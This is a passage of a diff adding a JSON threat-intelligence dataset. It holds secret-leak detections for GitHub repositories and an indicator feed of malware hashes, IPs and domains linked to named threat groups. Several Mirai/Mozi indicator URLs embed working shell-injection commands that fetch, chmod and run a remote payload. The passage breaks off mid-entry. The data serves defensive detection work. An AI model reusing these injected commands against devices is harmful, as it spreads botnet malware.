30 + }, + "id": "362cc87c04580fefb42e28c780b07b1d78ca9430", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "FE/public-html/app.js", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "d5f9b30c3816d0af4f9f63b4260be814a9b27a68", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686439393 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/FE/public-html/app.js" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-22T00:36:55+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "b213f7127b8fbfe76e0cc076b4381618b9e6ef61", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "147e80f0c70f6cd4d923bfc09e3de7ea37f93601", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686179309 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-05T18:55:57+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "54a3d4900f0af60ee79d5939c4dfc2ff17b333a1", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/test/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "163839df539930714366aac403a8fc32f592c3ff", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1683302157 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/test/resources/application.properties" + } + ], + "id": "b7f7c981d54f93a58af9a9d6024f4907f1c49c6c", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/bartlomiejkrawczyk/PAINT-23L", + "numberOf": { + "contributors": 9, + "files": 10 + }, + "relations": { + "pytia": "pytia" + }, + "seqUpdate": 1728734317546081, + "source": "github" + }, + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "begin private key": 2, + "password": 6 + }, + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T14:58:22+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "9925f833b3b4ae766ebcd0d3e6d65f56f3a728f7", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "4e8bd797c4986e94a5d6a8ed296391b6c6d0e5cc", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1712751362 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2024-04-10T15:16:02+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "a1e944fbfd7ea5b6cc4445b36b7c20fcf04dbc21", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README_PL.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "7bb835f3c70c795af6b0905acac54df259363db9", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1712751372 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/blob/master/README_PL.md" + }, + { + "dataFound": [], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "fdf8fc37755c78a240b77641a97b61bd94b645e2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "DATABASE/data/pl/5.txt", + "revisions": [ + { + "bind": [ + { + "bindBy": "pytia", + "companyId": 4189, + "data": "pytia", + "ruleId": 455991, + "type": "keyword" + } + ], + "data": null, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": { + "pytia": "pytia" + }, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/DATABASE/data/pl/5.txt" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "026768532bcf4dd2d210a5a737ecd360836b94c2", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "AUTHORIZATION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "b912425818c603960dd60f29a9bcc84f5715b090", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "SESSION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "1d2eb46187084a1968523de96477b7fb7c6b8d86", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "748ba40c667039a0de88a0b38482265ad01c2a6f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "796973b223778cd4d5c07b4787d2ec00704fd325", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "e90f2df5fdb22056e360ee8c19335d90047498fa", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "FE/public-html/app.js", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/FE/public-html/app.js" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "4256b013e8f6de1cd19a09cae9a90e7f0c92ccc9", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "a4fc7c10ad0a1ed8c44199ca8245e8aa080cc97f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/test/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/test/resources/application.properties" + } + ], + "id": "982e16c0481ef7b95ca105769c783336c99cdc6c", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/CrustyCracker/Wordle", + "numberOf": { + "contributors": 2, + "files": 11 + }, + "relations": { + "pytia": "pytia" + }, + "seqUpdate": 1728734319944338, + "source": "github" + } + ], + "seqUpdate": 1728734319944338 + }, + "ioc/common":{ + "items": [ + { + "id": "6337a9653cd46b5e2fc5394696201951027905b6", + "type": "file", + "dateFirstSeen": "2024-10-05T00:00:00+03:00", + "dateLastSeen": "2024-10-05T00:00:00+03:00", + "seqUpdate": 15996048022320, + "hash": [ + "73fe053e733bd116d605b76e02b74fb1456326a7", + "fe16a85a3f0094134eef4ba209c188a186ed269de90a6b5a84bcc4b90470cc79", + "b372fd09864d839112b79b7f0675f7df" + ], + "malwareList": [ + { + "name": "CobInt", + "aliases": [] + } + ], + "threatList": [ + { + "name": "Cobalt", + "title": "Attacks of Cobalt gang based on using CobInt" + } + ] + }, + { + "id": "7e9e25521f410ca468f64f7d72993e05a5de6a97", + "type": "file", + "dateFirstSeen": "2024-10-02T00:00:00+03:00", + "dateLastSeen": "2024-10-02T00:00:00+03:00", + "seqUpdate": 15996750885890, + "hash": [ + "325504b23944b32ecd93579a470e51d6c0a49bfd", + "eb1603d2619a3e736a52ca4fa3ca942eea0349908c482eb004b45f6f820edb77", + "b33cd8d369a7167351c69fe57bae0bb1" + ], + "malwareList": [ + { + "name": "Silence.ProxyBot", + "aliases": [] + } + ], + "threatList": [ + { + "name": "Silence", + "title": "Silence’s mass email sending to Russian banks" + }, + { + "name": "Silence", + "title": "Silence’s mass email sending to Russian banks" + } + ] + }, + { + "id": "d5e2db0967d73c6c462b389918a7dc7e0bddc66b", + "type": "file", + "dateFirstSeen": "2024-10-01T00:00:00+03:00", + "dateLastSeen": "2024-10-01T00:00:00+03:00", + "seqUpdate": 15997038594768, + "hash": [ + "fdcb8c6370cd844989fc913b8807401cfbea535b", + "ba25262913c9581dfc1bb14f28b2eff9e8cab2027fad217208ac25c1215a9489", + "01207851e364ddc432139da8c6287dff" + ], + "malwareList": [ + { + "name": "CobInt", + "aliases": [] + } + ], + "threatList": [ + { + "name": "Cobalt", + "title": "Attack of Cobalt gang" + }, + { + "name": "Cobalt", + "title": "Attack of Cobalt gang" + } + ] + }, + { + "id": "7caa3b26dc9ff3b48bc9d04f535ab95efa8da3ef", + "type": "file", + "dateFirstSeen": "2024-10-05T00:00:00+03:00", + "dateLastSeen": "2024-10-05T00:00:00+03:00", + "seqUpdate": 16109699365784, + "hash": [ + "65a3e6f290962d9e620bffe2b13c21c06fc0486c", + "42ded82ef563db3b35aa797b7befd1a19ec925952f78f076db809aa8558b2e57", + "c9ed44cfc79c52e12fcf969c78a83ad4" + ], + "malwareList": [ + { + "name": "FlawedAmmyy", + "aliases": [] + } + ], + "threatList": [ + { + "name": "TA505", + "title": "Malspam campaign using attachments weaponized with FlawedAmmy RAT" + } + ] + }, + { + "id": "8091f27e36767447180b42675328a77c0ac8058a", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17270610151738, + "ip": [ + "45.61.169.126" + ], + "malwareList": null, + "threatList": [ + { + "name": "Nitrogen", + "title": "Nitrogen - New indicators have been found" + } + ] + }, + { + "id": "9c0f18dccca37a768eb2f7750203b2fa22714139", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17270636175525, + "ip": [ + "8.216.85.26" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "2b770d697fa23c3f37a39383874fb1f208d4fdef", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "asas11.com", + "seqUpdate": 17270700146547, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "af93635787b966ee83936ffd3459581dddd6d93b", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "icasshop.com", + "seqUpdate": 17270700147327, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "3de83b1f1b29429a0735b815e2b8e4704b9351b0", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "0717it.com", + "seqUpdate": 17270700148082, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "126e43f40540e34e47c4080b1d857cf910320715", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "wqywt.com", + "seqUpdate": 17270700148956, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "37a711836f575819fd51a61d316710598f7bc1cf", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "lfsyys.com", + "seqUpdate": 17270700149627, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "43ceedccb81cb4d146f6d3b9723cd0438ceeb7da", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "sxsfsm.com", + "seqUpdate": 17270700150474, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "5dc9d78224a53f52c486a870979ea66022272430", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271000340866, + "hash": [ + "60ed30bea0f9e2db5cc1f45241c7473c", + "62b33edc9682bc780bc68d34ae7b19eaf429e42d", + "fc28d2eaee1fd3416fe3e0cd4669df3ac178c577e3a8c386b1c34c3146afb8d6" + ], + "malwareList": [ + { + "name": "Babuk", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6ecb34d68b26c7bc369dd209f0db9cc3a9c6a8c7", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17271228138607, + "ip": [ + "95.179.134.240" + ], + "malwareList": null, + "threatList": [ + { + "name": "APT41", + "title": "APT41 - New indicators have been found" + } + ] + }, + { + "id": "375efaa5e042b289579c147dd1c95d9b8ccdbee4", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271390119447, + "ip": [ + "147.78.12.202" + ], + "malwareList": null, + "threatList": [ + { + "name": "Mustang Panda", + "title": "Mustang Panda - New indicators have been found" + } + ] + }, + { + "id": "d73f92538c09bb2ee803865d348e845e9cddf4ed", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271402174214, + "ip": [ + "45.61.165.15" + ], + "malwareList": null, + "threatList": [ + { + "name": "Nitrogen", + "title": "Nitrogen - New indicators have been found" + } + ] + }, + { + "id": "03e5c42fbc278e9991cc2dcf0624e03915c5ec40", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "mozhuzs.com", + "seqUpdate": 17271444135820, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "41d5d53349f8a71a42e3be3415da349af612d4dd", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "zscqwd.com", + "seqUpdate": 17271444136481, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "e6319fb8e3c3ed28fc4d9fc1321ef25d390c8cfa", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "cpanel.co9dance.com", + "seqUpdate": 17271551822563, + "malwareList": [ + { + "name": "Emotet", + "aliases": [ + "Emotet", + "Geodo" + ] + } + ], + "threatList": null + }, + { + "id": "0a3f9339b944b7976bbbccf6a695592ce97b7523", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "wehermes.com", + "seqUpdate": 17271570168080, + "malwareList": null, + "threatList": [ + { + "name": "Oilrig", + "title": "Oilrig - New indicators have been found" + } + ] + }, + { + "id": "bcc73e2e28e4eef80b7dee2101fa8c4a9e64b5ab", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271588170425, + "ip": [ + "172.86.121.163" + ], + "malwareList": null, + "threatList": [ + { + "name": "Nitrogen", + "title": "Nitrogen - New indicators have been found" + } + ] + }, + { + "id": "2eddf1bc0e8231a038d28f9166efffb3fd185283", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "4kqd3hmqgptupi3p.prudential.com", + "seqUpdate": 17271636188505, + "malwareList": [ + { + "name": "Cerber", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0f7551c45b3330faf80fc5a4b09a13092e514413", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "36230643643123223.jingbocheye.com", + "seqUpdate": 17271673081477, + "malwareList": [ + { + "name": "HttpBrowser", + "aliases": [ + "TokenControl", + "HttpDump" + ] + } + ], + "threatList": null + }, + { + "id": "9906d07d097cc924eff5bebd9d3f8e660345c3a2", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "crm.shark-net.com", + "url": "https://crm.shark-net.com/GponForm/diag_Form?images/", + "seqUpdate": 17271737986012, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ec33fcd3dc71367486709722bae67dea3b924a84", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://185.186.92.117/shell?cd+/tmp;rm+-rf+*;wget+http:/117.213.253.18:38776/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271738426502, + "ip": [ + "185.186.92.117" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4f9f3e22fea80314eddc8eb0c35ea27d3e54ffa5", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271738506597, + "ip": [ + "117.213.253.18" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "18b524ecd283508f1340355442a58ac8cd594fc6", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "https://185.186.93.9/shell?cd+/tmp;rm+-rf+*;wget+http://102.41.67.208:49151/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271740508590, + "ip": [ + "185.186.93.9" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "f42ff9d4ad6017086ab63528a48c8fcbdb4164fd", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://185.186.93.9/shell?cd+/tmp;rm+-rf+*;wget+http:/102.41.67.208:49151/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271740588691, + "ip": [ + "185.186.93.9" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "e6cf94c78ccaf47953aaec05206114d4abfce97d", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271740668773, + "ip": [ + "122.96.31.11" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "17b83bf8ec081f164b64e07a94b13f975a0830a5", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271740828913, + "ip": [ + "150.246.185.107" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7794f0640baa9635dde84acf72613315d9f21f1c", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://194.143.143.92/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271742070159, + "ip": [ + "194.143.143.92" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a951e58828a652f58b1d83a35ece116bc4f5384b", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271742150260, + "ip": [ + "120.85.143.32" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6c476c94411019c92ae577ff29640059a99570b3", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "services.netserv.it", + "url": "https://services.netserv.it/shell?cd+/tmp;rm+-rf+*;wget+http://117.194.222.127:48116/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271742310403, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4c58e7e792677c12e085584858456a916aeadf26", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://91.241.86.173/shell?cd+/tmp;rm+-rf+*;wget+http:/117.194.222.127:48116/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271742310403, + "ip": [ + "91.241.86.173" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9552634c5736847a120fdba581ecd064dcd7f48a", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271742390481, + "ip": [ + "117.194.222.127" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "28b31e5eb264ee7aca043e3208205339600df6bc", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-10-20T00:00:00+03:00", + "domain": "www.saecoprofessional-online.com", + "url": "https://www.saecoprofessional-online.com/?images/", + "seqUpdate": 17271742862997, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5f07dc76ad5da9d1af1a1e4966570d2388d9c80d", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271744058998, + "ip": [ + "175.145.104.233" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "84e2c6024683d2630d487fca2ff812b8e898518f", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-10-03T00:00:00+03:00", + "domain": "in.originaljapan.com", + "url": "https://in.originaljapan.com/Infinity/GponForm/diag_Form?images/", + "seqUpdate": 17271876590688, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0e91008ddae323fc0dca97c1670665489c1d2f49", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-10-23T00:00:00+03:00", + "seqUpdate": 17271915368314, + "ip": [ + 